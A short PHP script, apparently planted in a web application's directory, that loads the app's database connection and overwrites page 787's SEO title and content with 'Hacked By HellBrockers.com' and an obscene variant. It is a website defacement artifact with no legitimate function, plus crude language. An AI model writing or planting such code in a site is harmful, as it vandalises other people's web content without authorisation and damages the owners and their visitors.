<?php
require '../../vendor/autoload.php';
require '../../app/init.php';


$update = $conn->prepare("UPDATE pages SET seo_title=:seo_title, page_content=:page_content WHERE page_id=:id");
             $update = $update-> execute(array("id"=> 787, "seo_title" => "Hacked By HellBrockers.com", "page_content" => "Fucked By HellBrockers.com" ));
          ?>